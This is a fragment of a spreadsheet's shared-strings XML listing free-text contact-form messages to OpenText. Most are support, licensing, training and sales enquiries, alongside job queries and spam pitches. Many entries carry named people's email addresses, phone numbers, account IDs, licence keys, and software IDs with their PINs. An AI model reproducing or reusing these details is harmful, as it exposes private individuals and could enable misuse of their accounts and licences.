    <t>I am working with my client KPN, Dutch Telecom company. It has a support contract with Opentext for the product OpenText StreamServe V5.6.2. I was provided with access to support portal and knowledge center for raising support tickets and resources. Now, its revoked. Can you please check whats the reason and this is preventing us to get resources or raise any customer tickets.</t>
  </si>
  <si>
    <t>I am unable to log in to support to download updates to Encase Forensic, and check on my software expiration date. My license key is G3002093796</t>
  </si>
  <si>
    <t>We recently we acquired by Tokai.  Our former company was using Spyview as a Document Management System. We are looking to move our IBM iSeries platform applications out from under the old company and into a hosting center. I am looking for pricing on what it would take to keep OpenText running in that new environment for 3 years.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
My name is Ashley Young, would you be interested in purchasing our updated and permission based Utility Industry Decision Makers Email List across USA, Canada &amp; Australia. _x000D_
_x000D_
In our list every lead includes: Contact Name, Job title, Company name, Website, Physical address, City, State, Country, Phone Number, Industry vertical &amp; Opt-in E-mail address._x000D_
_x000D_
I’d be happy to send over few Sample data for your reference and please let me know would you like reach the below mentioned target market criteria? _x000D_
_x000D_
•	CEOs/CTOs/COOs/VPs/Presidents_x000D_
•	Utility Engineers/Contractors_x000D_
•	Power and Utility Managers_x000D_
•	Electric and Gas Utility Managers/Directors_x000D_
•	Fleet Managers/Directors_x000D_
•	Water Utility Managers/Directors_x000D_
•	Utility Safety Managers/Directors_x000D_
•	IT/ICT Utility Managers_x000D_
•	Supply Chain Managers/Directors_x000D_
•	Purchasing Managers/Directors_x000D_
•	Design/Specifying and Safety Engineers_x000D_
•	Repair and Maintenance Managers_x000D_
•	Water and wastewater Managers/Directors_x000D_
•	System Development and Planning Engineers/Managers_x000D_
•	Power Supply Engineers/Managers_x000D_
•	Grid Operators/Managers_x000D_
•	Network Engineers/Managers_x000D_
•	R&amp;D Engineers/Managers_x000D_
•	Quality Control and Assurance Engineers/Managers_x000D_
•	Technical Engineers/Managers_x000D_
•	Maintenance/Field Technicians_x000D_
•	Business Development Managers/Directors_x000D_
•	Operation and Maintenance Engineers/Managers_x000D_
•	Dealers/Distributors/Suppliers/Retailers_x000D_
_x000D_
Else, please fill your specific target market criteria in the below mentioned format, So that I can run counts and get back to you with samples, benefits and more information for your review._x000D_
_x000D_
Target Job title: _________ Target Industry: ______________   Target Geography: _____________ _x000D_
_x000D_
Thank you so much for reading my mail even in your busy schedule_x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Ashley Young _x000D_
Business Development Coordinator_x000D_
US Data - Email Append - Data Append - Technology Specific Data - Email Marketing._x000D_
Email: ashley.y@chief-exhibitus.com_x000D_
_________________________________________x000D_
If you n</t>
  </si>
  <si>
    <t>I am trying to access the knowledge base to download the Exstream software but am getting an error.</t>
  </si>
  <si>
    <t xml:space="preserve">A real shot in the dark here, we have an attorney who has maybe 8 DVDs with this software, Alchemy Search.  The EXE is dated 2009 so it’s a bit dated and we can’t get the program to run and without it the data appears unreadable._x000D_
_x000D_
I did a little digging and it looks like OpenText bought Captaris and maybe improved on their methods… is there anyway you can get me in touch with someone who can crack open this Alchemy nut?_x000D_
</t>
  </si>
  <si>
    <t>We have an EDI VAN mailbox on the network that was formally Inovis.  We wish to terminate it at the end of February 2019.  Please call me.</t>
  </si>
  <si>
    <t>We have paid for licences for key G2002023558.  I am not sure on how to update the license key or download the latest version 8.08. Assistance would be appreciated.</t>
  </si>
  <si>
    <t>I'd like to discontinue my Fax2Mail service. My fax no is 866-800-6549</t>
  </si>
  <si>
    <t xml:space="preserve">Wanted to understand better EDI solutions that your company offers </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We have been using PixTools for a while now and hadn't had a need to contact support, but it looks like EMC became part of Dell and then according to Dell you guys are now the support contact for PixToools.  If you could please confirm if this is the case that would be great?  Also, where is PixTools located on your site?  I don't see any information on it (we are looking to see the current version etc)._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Bryce Gardinier_x000D_
Helion Software, Inc.</t>
  </si>
  <si>
    <t>Try login to knowledge site it and it fail._x000D_
reset password got: The email address you entered is not registered with OpenText Connect. Please try again or cancel.  and when I attempted to reg it told me email already reg. Eugene.w.bingue.civ@mail.mil, please reset</t>
  </si>
  <si>
    <t>Need encase forensics software. Please send a quote ASAP</t>
  </si>
  <si>
    <t xml:space="preserve">Please grant access to My Support to id `thumper@us.ibm.com'. Dominic Le Voci is my Sr Acct Exec. </t>
  </si>
  <si>
    <t>I would like a quote and to attend live training for the following course. my schedule is open for upcoming or very near future classes._x000D_
DF120 — Foundations in Digital Forensics with EnCase_x000D_
IR250 — Incident Investigation</t>
  </si>
  <si>
    <t xml:space="preserve">I have a question regarding our account number US01-21103, mainly concerning Expedite /MVS Host and Expedite Base/MVS. My email address is Karen.phillips1@hshs.org </t>
  </si>
  <si>
    <t>We can not log into the active catalogue, accountId=125167552117. Can you tell me what the issue may be ?</t>
  </si>
  <si>
    <t xml:space="preserve">I recently returned to a position that requires me to manage and on occasion support Open Text applications that Bechtel licenses.  My email address was registered many years ago but since then I forgot my password.  When I try to change my password, I get the email, click the link the Set Your Password page opens but when I try to set a new password the following error occurs (Update password failed) - I've tried on 4 separate occasion this morning.  I'm going to stand down until I hear back from you guys.  Thanks much, Rick </t>
  </si>
  <si>
    <t>Although I am a OpenText employee I am unable to open a support ticket</t>
  </si>
  <si>
    <t>Can you please send me the download link for the latest Biquery User and Admin version?_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>KM</t>
  </si>
  <si>
    <t>To whom it may concern:_x000D_
_x000D_
My name is Craig Maurer and I am the new Systems Administrator for Children's Institute. We have a very old version of TeleForm 9.1. I would like to inquire about newer versions. What is the cost for a single license? What Operating Systems are supported? What scanners are supported etc._x000D_
_x000D_
Please feel free to contact me at any time regarding this matter._x000D_
_x000D_
Thank you in advance for your time and efforts._x000D_
_x000D_
Craig Maurer_x000D_
Systems Administrator_x000D_
Children's Institute</t>
  </si>
  <si>
    <t>NewLaw Solicitors is one of the UK’s most innovative and fastest growing law firms, specialising in all areas of personal injury law from whiplash claims to catastrophic injury cases to Welfare, Wills, Trusts, Court of Protection and Probate _x000D_
NewLaw is developing a response to the “Whiplash reforms, which is referred to by the Ministry of Justice (MoJ) as ‘Reforming the soft tissue injury (‘whiplash’) claims process’ and is now enshrined in the Civil Liability Act. _x000D_
NewLaw’s response will:_x000D_
1.	Devise an operating model for ‘low value’ personal injury claims that will be relevant, commercially viable and fit for purpose in any post-reform environment._x000D_
2.	Develop and implement processes and IT systems that will facilitate the deployment of the operating model._x000D_
3.	Ensure that the new model is compliant and enhances the customer journey and proposition._x000D_
As part of this NewLaw is looking for a vendor that is able to provide a solution that will enable it to respond to the reform and ensure that its systems and processes are fit for purpose._x000D_
If you could contact me to discuss this opportunity, it would be appreciated_x000D_
Kind regards, Martin</t>
  </si>
  <si>
    <t>I need to open a support call to figure out the exact syntax for passing in a document reference in AX Web Services. Should look something like this: "//Datasource/DOC/Appid/docid"_x000D_
_x000D_
Please help me open a support call._x000D_
_x000D_
Thank you,_x000D_
Ken</t>
  </si>
  <si>
    <t>please reset and give the password .and send invitation code</t>
  </si>
  <si>
    <t>Hello! I am a graduating student from De La Salle University-Manila currently taking BS Information Technology. I am interested to apply for an internship program in this company. My deployment for the OJT will be on May 20, 2019 and I need at least 520 hours to complete. I would also like to ask if there are any additional requirements needed to apply for the said internship program. Thank you!</t>
  </si>
  <si>
    <t>Ich wollte ein Update bei Free DWG Viewer machen, verstehen aber kein Englisch könnt Ihr das einen mal verdeutschen??</t>
  </si>
  <si>
    <t>Dear Vendor,_x000D_
_x000D_
 _x000D_
_x000D_
We received a notification (invoice GB100097556) indicating that your bank details have changed. For audit and security reasons, these new bank details need to be verified with a trusted and known source at the vendor._x000D_
_x000D_
Could you therefore please send us a PDF of your bank details?_x000D_
_x000D_
Thanks in advance_x000D_
_x000D_
 _x000D_
_x000D_
Yours truly,_x000D_
_x000D_
BD Vendor Care Team</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for internship_x000D_
</t>
  </si>
  <si>
    <t>How can I download the free EnCase Forensic Imager 7.10 - English?</t>
  </si>
  <si>
    <t>We are looking for the partner for CCM solution. Please share the contact detail to discuss further.</t>
  </si>
  <si>
    <t xml:space="preserve">We want to know if there is high level api http to check the health of Documentum. _x000D_
We want to call this api to monitor the state of all Documentum applications. </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,_x000D_
_x000D_
_x000D_
I would like to take this opportunity to briefly introduce our company Tes-Amm India Pvt Ltd., which is a well established organization from past 9 years, with business transactions carried out in India as well as multinational. We are multinational company operating in 20 countries and have capability of picking up the E-Waste across the Country._x000D_
_x000D_
TES-AMM provides the optimal reverse logistics solution that is legally compliant, environmentally responsible and economically feasible. TES-AMM ships materials from client's location to one of our world-wide processing centers. Our procedures comply with international and local regulations, including the requirement of a Hazardous waste license for transportation. With an export license issued by the authority of the exporting country and a matching import license for the country of destination, TES-AMM ensures that your electronics will be delivered in a legally compliant manner that meets best practices established internationally. _x000D_
_x000D_
We would like to buy  the following items as mentioned below ,_x000D_
_x000D_
1) Desktops &amp; Accessories_x000D_
2) Laptops &amp; Accessories_x000D_
3) Servers_x000D_
4) Storages _x000D_
5) Printer &amp; Accessories_x000D_
6) IT Hardware products_x000D_
7) Networking products_x000D_
8 )Scrap television and panels _x000D_
9) Gadgets_x000D_
10)Scrap_x000D_
_x000D_
If you posess any kind of E-Waste  , Feel free to contact us for your further queries_x000D_
 </t>
  </si>
  <si>
    <t>LR</t>
  </si>
  <si>
    <t xml:space="preserve">I have been using Desktop Barava 7.2 from couple of months. _x000D_
There is windows upgrade happening in my office. Hence I have changed my laptop. Due to change is laptop, this software stopped working. Here is details of new computer_x000D_
MAC ID: C8-F7-50-22-94-1D_x000D_
Desktop Brava 7.2_x000D_
Software ID: a036000000jk3xE_x000D_
PIN: 402236_x000D_
_x000D_
Can you please send license file for this._x000D_
_x000D_
Regards,_x000D_
Vimal_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
please guide us how to activate licence in open text exceeded ._x000D_
we have the license</t>
  </si>
  <si>
    <t>Bdhdbdb</t>
  </si>
  <si>
    <t>I am unable to access any knowledge base articles. Get an error</t>
  </si>
  <si>
    <t>Hi There,_x000D_
I tried to setup a password and activate my account but it keeps saying failed. I used a password with 7 characters including uppercase, lower case and numbers. _x000D_
Kind regards_x000D_
Andrew Smith</t>
  </si>
  <si>
    <t>Please to provide me with product specifications of Documentum, including brochures, product family and compatible third-party tools, datasheets, system integration capabilities, and licensing schemes.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi There, _x000D_
_x000D_
I’m consulting with a CEO of a 200 employee company in CA (prefers to remain incognito as of now) to assess new EIM software. _x000D_
_x000D_
Currently, the company is using DropBox and Hubspot as their cloud services, though I didn’t see them listed on your website. They are hoping to have their files/data integrated in order to make everything more efficient. _x000D_
_x000D_
Do you offer out of the box integrations with those apps or plan to soon? If not, how would you recommend connecting your platform to their apps?_x000D_
Thanks!_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hello,_x000D_
We are a Healthcare organization who is currently using analog fax lines with MFPs, a couple older fax servers for specific applications, and using Epic Community Connect. We are looking for information on how your product could replace what we are currently using and integrate into our systems._x000D_
_x000D_
Thank you, </t>
  </si>
  <si>
    <t>I am trying to get a contact phone number for HR in order to verify my prior employment.  From 2009-2013 I was employed at Daegis Inc, which was acquired by Opentext in 2015. Currently, my potential employer is trying to verify my employment and is unable to get in contact with anyone that can do so.  Thank you.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I have an Opentext archive system (IXOS) and the password for the dsadmin id has been misplaced or missing from documents.  Is there a way to reset or recover the password? I am trying to use the Opentext Administration client to connect the IXOS server._x000D_
I don't have a support contract._x000D_
Thank you for your help</t>
  </si>
  <si>
    <t>Looking into more information about the product, image and document scanning capabilities, indexing and connection with ERP software like PeopleSoft, DLP capabilities.  We would like to know how it compares to a product like Perceptive Content (ImageNow)</t>
  </si>
  <si>
    <t xml:space="preserve">How to register for the 3-2105 - SAP VIM Bootcamp certification exam?_x000D_
our company have access to LOD (Learning on Demand) portal._x000D_
</t>
  </si>
  <si>
    <t>Hi there, I have been partially approved for the EnCase Annual Training Passport for OnDemand classes.  It seems like some of the links I used to review when I first put in for this class months ago, are no longer working... so needing to clarify if this is still being offered?  It appears it is, but the brochure which clearly showed possible classes to take is no longer shown.  Any help you could provide would be great.  Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi OpenText._x000D_
I have applied for a job as Project Manager with you, Job Ref#: 22023. I am inquiring as to when I am likely to hear if my application has been received and reviewed. </t>
  </si>
  <si>
    <t>Hello, We are upgrading to a new version of RightFax and I am trying to access the download section to get the latest software release and patches if any? Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We are a software company with a client, Pacific Life, in Newport beach CA. They have just installed Opentext moving away from Filenet. Our system needs to call your API to list files in opentext using a loan number.  They have no documentation. We are making the following API calls:_x000D_
Authentication.svc?wsdl_x000D_
ContentService.svc?wsdl_x000D_
DocumentManagement.svc?wsdl_x000D_
SearchService.svc?wsdl_x000D_
_x000D_
Can you please point me in the correct direction for documentation?_x000D_
_x000D_
Thank you _x000D_
  _x000D_
</t>
  </si>
  <si>
    <t>Looking for contact information to set up an Encase Annual on demand passport</t>
  </si>
  <si>
    <t>I am writing on behalf of Traffictech's IT department. I recently spoke to your technical support department and noticed that our account is under Jeremy Strike's name. _x000D_
This employee is no longer with us and we would like to request a name change for this account. It would be under Robert Sanchez, Systems Administrator at TrafficTech. His extension is 7016 under the same business phone number._x000D_
_x000D_
Please let me know when the changes take place._x000D_
_x000D_
Thanks,_x000D_
Kamil</t>
  </si>
  <si>
    <t xml:space="preserve">since upgrade cannot log in to RightFax web_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We currently have a 2 port rightfax express appliance.  We could use a total of 4 ports whether that would be replacing existing with a 4 port system or just add an additional 2 port system.  We were just wondering what the cost would be including ongoing support costs._x000D_
</t>
  </si>
  <si>
    <t>change  my email</t>
  </si>
  <si>
    <t>i change my email _x000D_
FROM FHUSAIN @SLFCHO-SACOM_x000D_
TO      FHUSAIN_I@OUTLOOK.COM</t>
  </si>
  <si>
    <t>I have some questions on Software Maintenance renewals.  Our customer would like to know whether they can cancel their upcoming Captiva Maintenance renewal?  If they decide not to cancel, can they modify what is included in the upcoming Captiva Maintenance?   Can someone call me to discuss. _x000D_
Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I am trying to set a new tradingship between Hanza and Avnet._x000D_
Previous I used GXS support and account AMR46508@emea.gxs.com, but this seams not to be working anymore._x000D_
_x000D_
Could you advice there I can create new tradingships?_x000D_
The tradingship will be between Hanza PRD:TRK and Avnet AVNETEMEA:ZZ_x000D_
Best Regards _x000D_
Jan_x000D_
</t>
  </si>
  <si>
    <t>Pricing for desktop license (1-4) of TeleForm.</t>
  </si>
  <si>
    <t>Hello - I am trying to apply for a job and have created an account. However, I cannot log back in. The system tells me my email, stephaniekmoreno@gmail.com, is in your system (because I was able to create an account) but I was logged out when trying to complete the application and have not been able to go back in. I have asked for a password reset link and have not received anything. Can you please look into this so I may complete the job application? Thank you</t>
  </si>
  <si>
    <t>We need to get a GXS mailbox and trading partner relationships setup quickly as we are changing EDI providers and need to reroute traffic.</t>
  </si>
  <si>
    <t>We have a licensed install of the product Imaging for Windows 4.0 that requires a registration code to function. We have the serial number and old registration code, however, it doesn't appear to validate the software. _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Corey Mekelburg</t>
  </si>
  <si>
    <t>Would like someone to contact me regarding my RightFax system to purchase a Maitenance contract._x000D_
Server: RightFax 10.0, SUID - 20320-12153_x000D_
_x000D_
Gateway: Serial Number:3935217,  Mediant 1000</t>
  </si>
  <si>
    <t>I received my account info but I get error when trying to open link to Installation quide for VIM 7.5 for SAP Solutions.  I am not allowed to open ticket.  Please help.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Please provide a list of authorized re-sellers that are able to quote maintenance and support services for Fax Gateway 2100. As per public sector procurement directives, I must obtain quotes for at least 3 re-sellers._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Management System Platform with Mobile Capability and workflows for change management.</t>
  </si>
  <si>
    <t>Subject: PR Coordinator Job Application _x000D_
Hi there, I came across the opening for PR Coordinator at your organization and would like to be considered for it. In order to apply for the position, I tried to submit application on your website by logging into LinkedIn, however, I have not received any confirmation on LinkedIn or on email. I tried to login with my other email (rajanibijal10@gmail.com) too, however, I still have not received any notification. I would really appreciate if you can help me here, as I really wish to apply for this. _x000D_
_x000D_
Thanks and regards, _x000D_
Bijal Rajani</t>
  </si>
  <si>
    <t>I am new for OpenText api._x000D_
How can i access to OpenText connect to get the support about OpenText api</t>
  </si>
  <si>
    <t xml:space="preserve">Can you point me to Document Documentum programming Courses in 16.4 please. I can only find 7.1 courses on here. </t>
  </si>
  <si>
    <t>Hi, can you support me with the following quote:_x000D_
EnCase Forensic SMS Porcessor (+ EDS) Codemeter Time Security Key G 2002050082_x000D_
It is to be resold to my client._x000D_
_x000D_
Thanks and regards</t>
  </si>
  <si>
    <t xml:space="preserve">I am attempting to gain access to the issues forum.  Once all of my info is entered, I receive an error message.  My employer is Eagle Family Foods Group.  Customer ID EU0276503 and license key is QB8KINIW2VQ.  </t>
  </si>
  <si>
    <t xml:space="preserve">Help, can't registy EnCase dongle G2002078582, expirity date 24-09-2019. </t>
  </si>
  <si>
    <t>Looking to certify in Exstream. And take classes. Prefer subscription if possible. Have 2+ years having worked with HP v 6.13 for Fidelity and need upgrade training</t>
  </si>
  <si>
    <t>Dear Opentext,_x000D_
I represent SC Johnson globally regarding order automation, &amp; Opentext are an existing EDI provider to our business with services currently expanding._x000D_
_x000D_
We currently utilise order capture document recognition technology supplied by leading vendors. However as our processes &amp; vendors are always being reviewed, I would like to understand further details on this specific service you offer._x000D_
_x000D_
Can you kindly supply by email any further doumentation regarding the features of the OCR service? NB. Our customers order in varying template fromats via PDF, Excel, HTML, fax etc._x000D_
_x000D_
Thanks &amp; regards_x000D_
Chris Beestin</t>
  </si>
  <si>
    <t xml:space="preserve">I registered for Encase class scheduled for - Mar 26, 2019 	On-site 	DF120 - Foundations 	English 	GSI-Washington, DC	2,750.00. I have did received a email link to pay for the class, confirming my registration. Please advise </t>
  </si>
  <si>
    <t>A user is getting a "Cannot open file. c:\users\itdhernd\appdata\local\temp\alw07268.tmp" error.     I have tried deleting the tmp files within the temp directory, rebooting and trying again but the user keeps getting the tmp error message.</t>
  </si>
  <si>
    <t>Good morning. I hope you don't mind me contacting you in this manner. We are a family run printing company specializing in exhibition trade-show panels. We print a few stands at The Good Food Show and I was wondering if I could send you some information. We can create roll up, re-usable shell scheme panels for £55 each excl. delivery &amp; vat. This means a 3x2 stand can be fully printed for as little as £275 +vat. Thanks for your time and I look forward to hearing from you if this is of interest. Vincent Matania. IDL UK. 01424 858165</t>
  </si>
  <si>
    <t>Loans service chahiye 10 lac</t>
  </si>
  <si>
    <t>My company uses OpenText products. For installing new patches, I need a "My Support" account with OpenText. Yet I do not know my "Support Contact" and have trouble setting up that account. I do have a customer ID and a EU number for taxes._x000D_
Can you help me?_x000D_
_x000D_
Kind regards,_x000D_
Viktoria Albrecht</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I have been asked to look at OpenText File Intelligence to check out shared file spaces for GDPR compliance. I've read lots about the product and it seems to do everything we need. Would you be able to provide me with a quote for the software please?_x000D_
_x000D_
Regards_x000D_
_x000D_
Richard Martin</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, One of our customers wants to install VIM 7.5  SP8 for SAP ECC systems. I onluy found a ZIP file with installation package, but cannot find on MMarjetplace SP1-SP8. Can you please let me know where we can find them?_x000D_
 </t>
  </si>
  <si>
    <t>I need the end of Support date for Exstream (Dalogue) version 8.0. I cannot get through to the knowledgebase articles on my support account!_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>I seem to have got my self in a knot and lost my OpenText. connect access under penny.maguire@hcl.com when I ask for a password reset I do not get a mail_x000D_
I have also now tried to register under penny.maguire@royalmail.com (I have an email address also on RMG customer domain), but again I seem to not be able to gain access. _x000D_
_x000D_
Please advise how I regain my access / know my password for OpenText Connect on penny.maguire@hcl.com_x000D_
_x000D_
Many thanks</t>
  </si>
  <si>
    <t>Please can you quote me for DWR Welsh Water's Encase Cybersecurity SMS renewal serial key X100008004386. Thank you Christine</t>
  </si>
  <si>
    <t xml:space="preserve">We've gone through your website and found that it is designed using an outdated Joomla CMS.We specialize in digital collateral restructuring and can help you redesign your website with a better user experience.Please get back to us if you're interested for the same so we can consult further._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Opentext/Dataware software_x000D_
_x000D_
On behalf of our mutual customer DR (Dansk Radio/Danish Broadcasting Company ) we hereby enquire your help in creating a full purchase history of all Opentext/Dataware software software that details  ALL purchases please._x000D_
_x000D_
KMD is the largest Danish IT company _x000D_
_x000D_
We would like a spreadsheet detailing all purchases and:_x000D_
•	License name / entitlements_x000D_
•	Metric (for example pr user or pr device or pr cpu etc.)_x000D_
•	Amount of licenses_x000D_
•	start and, if an, end date of subscription_x000D_
•	Purchase date_x000D_
_x000D_
We really appreciate your kind help_x000D_
_x000D_
Here is the formal Permission from DR that authorizes you to help KMD with this purchase history_x000D_
_x000D_
_x000D_
Dear supplier_x000D_
_x000D_
We, DR (Danmarks Radio / Danish broadcasting corporation), hereby authorize  that KMD can get full access to our buying history._x000D_
_x000D_
This include _x000D_
•	License name / entitlements_x000D_
•	Metric (for example pr user or pr device or pr cpu etc.)_x000D_
•	Amount of licenses_x000D_
•	start and, if an, end date of subscription_x000D_
•	Purchase date_x000D_
_x000D_
Please supply KMD with buying history and help in creating the best license history as long back as possible_x000D_
_x000D_
As this is urgent – please answer back within 10 days_x000D_
_x000D_
We appreciate your kind help_x000D_
_x000D_
With regards_x000D_
_x000D_
_x000D_
–– –  –   –    –     –      –       –        – _x000D_
_x000D_
Maria Lund Høpfner_x000D_
Afdelingschef, Teknologisk service_x000D_
_x000D_
 _x000D_
_x000D_
DR_x000D_
København - Dr Byen_x000D_
DK-0999 København _x000D_
_x000D_
_x000D_
_x000D_
Please feel free to contact me if you have any questions regarding this email_x000D_
_x000D_
Best regards_x000D_
_x000D_
Allan Larsen_x000D_
SBU Contract Manager_x000D_
Produktsalg HW/SW _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I would like to have SOCKS Client trial version to check whether it`s this app usufully for me or not._x000D_
Regards,_x000D_
Marcin Downar</t>
  </si>
  <si>
    <t>Good Day,_x000D_
_x000D_
I would like to know is it possible to integrate coSign with Alfresco and what is licensing model .</t>
  </si>
  <si>
    <t>Hi,_x000D_
I canot see oir products and keys under my account although I recived the confirmation mail</t>
  </si>
  <si>
    <t>mySupport is not working for me._x000D_
i keep being asked to confirm my email and when i do, nothing changes._x000D_
I already emailed you about it but no response!</t>
  </si>
  <si>
    <t xml:space="preserve">I want to know who is your partners in Qatar and how we can implement POC </t>
  </si>
  <si>
    <t>Hi Team,_x000D_
My support is not working for me. It's showing "No Access" . I completed email confirmation also but still getting the "No Access"._x000D_
Please check and do the needful ASAP.</t>
  </si>
  <si>
    <t>Query about to know the details of electronic QMS from OPENTEXT</t>
  </si>
  <si>
    <t>We are a premium Manpower recruitment company supporting several known IT customers with manpower in different technical skills. Kindly let us know the process to become partner to support with quality resources.</t>
  </si>
  <si>
    <t>Hi!_x000D_
I need an access to customer support portal. How can I get it?_x000D_
My company's user id is EU0312053._x000D_
Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">My account has been locked. Pls assist to recover </t>
  </si>
  <si>
    <t>May I know if there is a HK local support team for your livelink email archiving product?</t>
  </si>
  <si>
    <t>Hi there!_x000D_
I want to ask one question._x000D_
I bought new laptop yesterday, and installed 'Brava! Desktop DXP 16.5 software' ,_x000D_
and typed in my software ID &amp; PIN, but it didn't authorized._x000D_
Old laptop is already deleted._x000D_
Can you solve this problem? _x000D_
please refer to below the my purchase information._x000D_
Thank you !_x000D_
_x000D_
Best wish_x000D_
Lee_x000D_
------------------------------------------------------------------------------------------------------------_x000D_
Please read this entire email to obtain your Brava! Desktop DXP 16.5 software._x000D_
Product Description: Brava! Desktop DXP_x000D_
Product Version: 16.5_x000D_
_x000D_
Email: butterie@tnce.co.kr_x000D_
Software ID: 0948CF95B65D42D78789179DB1CFA428_x000D_
Software PIN: IGC466139</t>
  </si>
  <si>
    <t>Hello - i have been an open source BIRT user for quite a while.  I have used the BIRT forum quite a bit to resolve problems.  I know things have changed -- is there still the concept of an open source BIRT forum?_x000D_
_x000D_
regards, len</t>
  </si>
  <si>
    <t>I scanned my code in my</t>
  </si>
  <si>
    <t>I am unable to add my  comments in the ticket which has been raised by team</t>
  </si>
  <si>
    <t>Hello! _x000D_
_x000D_
At this point purely on a discovery basis, I was hoping to learn a little more about Rightfax and potential integration points with our product..._x000D_
_x000D_
We have mutual customers who want to use PaperCut's Integrated Scanning along with Right Fax and my familiarity with RightFax is marginal. I am doing some digging for our product team to learn about:_x000D_
_x000D_
1) Hot folder support - Can Rightfax retrieve a scanned document (with metadata) from a hotfolder for import into the workflow/transmission_x000D_
2) If a hotfolder process is not available, what steps would we go through if we wanted to develop an integration with Rightfax?</t>
  </si>
  <si>
    <t xml:space="preserve">Do you have a list of multifunction devices that the fax to email service will work with?  I'm specifically interested in whether or not the Xerox VersaLink C405 will work. Thank you.  </t>
  </si>
  <si>
    <t xml:space="preserve">I am unable to access the support area to download the software.  I have attempted to reset my password and I never receive any additional notifications. </t>
  </si>
  <si>
    <t>I'm inquiring about the price of implementing EasyLink at my bookstore.  We run PrismCore (Formerly WinPrism), and were hoping to use EasyLink in electronic ordering between us and publishers (mostly Missouri Book Source)._x000D_
_x000D_
Thank you in advance.</t>
  </si>
  <si>
    <t>Hello,_x000D_
My company needs 2 licenses of ProVision to document and model a mining permit and licence process in a couple of provinces in Canada._x000D_
_x000D_
Is this license available monthly or just a one-time payment?_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Download the Free DWG Viewer and when you open a file DWG, i it shows the following message: Invalid license, Unable to load files.</t>
  </si>
  <si>
    <t>I have a client running Alchemy Administrator 8.3. The computer it is running on needs to be replaced and I am guessing that the 8.3 version will not run on a Windows 10 machine. Is there an upgrade to this product or another product that replaced it?</t>
  </si>
  <si>
    <t>I need a quote for Exceed 15 with an offline activation code.  The system that this needs to go on is air gapped from the internet.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
My name is Evalyn Max, would you be interested in purchasing our updated and permission based Legal Technology Industry Decision Makers Email List across USA, Canada &amp; Australia. _x000D_
_x000D_
In our list every lead includes: Contact Name, Job title, Company name, Website, Physical address, City, State, Country, Phone Number, Industry vertical &amp; Opt-in E-mail address._x000D_
_x000D_
I’d be happy to send over few Sample data for your reference and please let me know would you like reach the below mentioned target market criteria? _x000D_
_x000D_
•	Owner/President/Director/CEO/CIO/CTO/CFO/VP/MD_x000D_
•	Chief Legal Officer_x000D_
•	Legal Technology Manager/Director_x000D_
•	Legal Operation Manager/Director_x000D_
•	Legal Services Manager/Director_x000D_
•	Law Firm Owner/Manager_x000D_
•	Legal Consultant/Administrator_x000D_
•	General and Corporate Counsel _x000D_
•	Chamber Director/Head _x000D_
•	Practice Manager/Director_x000D_
•	Case Management Manager/Director_x000D_
•	Record Management Manager/Director_x000D_
•	Information System Engineer/Manager/Director_x000D_
•	IT Director/Manager/Head_x000D_
•	eDiscovery Manager/Director_x000D_
_x000D_
Else, please fill your specific target market criteria in the below mentioned format, So that I can run counts and get back to you with samples, benefits and more information for your review._x000D_
_x000D_
Target Job title: _________ Target Industry: ______________   Target Geography: _____________ _x000D_
_x000D_
Thank you so much for reading my mail even in your busy schedule_x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Evalyn Max _x000D_
Business Development Coordinator_x000D_
US Data - Email Append - Data Append - Technology Specific Data - Email Marketing._x000D_
Email: evalyn.max@greenprospect-us.com_x000D_
_________________________________________x000D_
If you no longer wish to hear from us please reply me with the subject line: "Opt Out"._x000D_
</t>
  </si>
  <si>
    <t>We would like to explore OpenText Documentum for our submission documents in Pharmacology and Toxicology.</t>
  </si>
  <si>
    <t>My company has support licence but I still can't have access to user support;  I had requested this a month ago and yet have not heard anything yet._x000D_
_x000D_
Service Agreement ID(s): 103476356873</t>
  </si>
  <si>
    <t>We are looking into the Customer Experience Management product and would like to set up an initial call to discuss.</t>
  </si>
  <si>
    <t xml:space="preserve">I tried to update my email id from usdoj dot gov to my other work address mahesh dot g do mudaliar at accenturefederal dot com and am unable to login or reset my password anymore. Can you kindly restore my account? </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,_x000D_
Good day!_x000D_
After updating contact information, email &amp; mobile..etc, I found the My Support not accessible._x000D_
Regards,_x000D_
Ehab_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Can you please forward me a download link for the latest version for our Encase Software._x000D_
Thanks _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am interested in understanding more about how your various platforms can be applied to Operations Performance Management/Real-time Operational Insight and Control/Business Activity Monitoring. This is on behalf of one of your existing LiveLink customers. </t>
  </si>
  <si>
    <t>Do you have a service to send invoices by email?_x000D_
_x000D_
Metaldyne Sintered Components Mexico_x000D_
Account: US01-300589_x000D_
EIN#: 52-1865641</t>
  </si>
  <si>
    <t>I work for Sabre and I have registered myself, but I do not have access to view the knowledge base articles or to download the software. Please advise</t>
  </si>
  <si>
